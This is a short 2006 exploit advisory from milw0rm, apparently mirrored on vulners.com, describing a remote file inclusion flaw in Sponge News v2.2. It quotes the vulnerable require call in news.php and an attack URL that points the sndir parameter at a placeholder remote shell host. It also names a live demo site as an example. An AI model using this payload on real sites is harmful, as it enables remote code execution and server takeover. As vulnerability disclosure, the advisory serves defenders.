Sponge News <= v2.2 (sndir) Remote File Inclusion Exploit

2006-09-0600:00:00

vulners.com

#==============================================================================================
#Sponge News <= v2.2 (sndir) Remote File Inclusion Exploit
#===============================================================================================

#Critical Level : Dangerous

#Venedor site : http://rickeeweb.free.fr/spongeweb/

#Version : v2.2

#================================================================================================
#Bug in : news.php

#Vlu Code :
#--------------------------------

# Les variables utiles

$newsdir = "news/";

$commentdir = "comments/";

$snversion = "2.2";

$lastmodif = "Decembre 2002";

$scriptdir = $sndir;

$page = $current;

require $scriptdir."config.php";

#================================================================================================

#Exploit :
#--------------------------------

#http://sitename.com/[Script Path]/news.php?sndir=http://SHELLURL.COM?

#Example :

http://rickeeweb.free.fr/sndemo/

#================================================================================================
#Discoverd By : SHiKaA

#Conatact : SHiKaA-[at]hotmail.com

#GreetZ : SiMooooo KACPER Rgod Timq XoRon MDX Bl@Ck^B1rd

Special Thx To : Str0ke

==================================================================================================

milw0rm.com [2006-09-05]

JSON

Sponge News &lt;= v2.2 &#40;sndir&#41; Remote File Inclusion Exploit